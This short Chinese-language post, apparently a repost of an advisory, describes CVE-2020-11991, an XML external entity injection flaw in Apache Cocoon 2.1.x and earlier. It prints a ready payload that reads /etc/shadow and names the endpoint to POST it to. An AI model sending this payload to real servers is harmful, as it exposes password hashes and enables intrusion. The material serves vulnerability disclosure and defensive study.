Apache Cocoon XML注入 [CVE-2020-11991]


受影響版本: Apache Cocoon <= 2.1.x

程序使用了StreamGenerator這個方法時,解析從外部請求的xml數據包未做相關的限制,惡意用戶就可以構造任意的xml表達式,使服務器解析達到XML注入的安全問題。

 

以下是apache社區官方提供利用方式:

<!--?xml version="1.0" ?--> 
<!DOCTYPE replace [<!ENTITY ent SYSTEM 
"file:///etc/shadow"> ]> 
<userInfo> 
<firstName>John</firstName> 
<lastName>&ent;</lastName> 
</userInfo>

與普通XXE並無差別,向/v2/api/product/manger/getInfo位置POST構造好的xml數據即可

來源:http://mail-archives.apache.org/mod_mbox/cocoon-users/202009.mbox/author


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM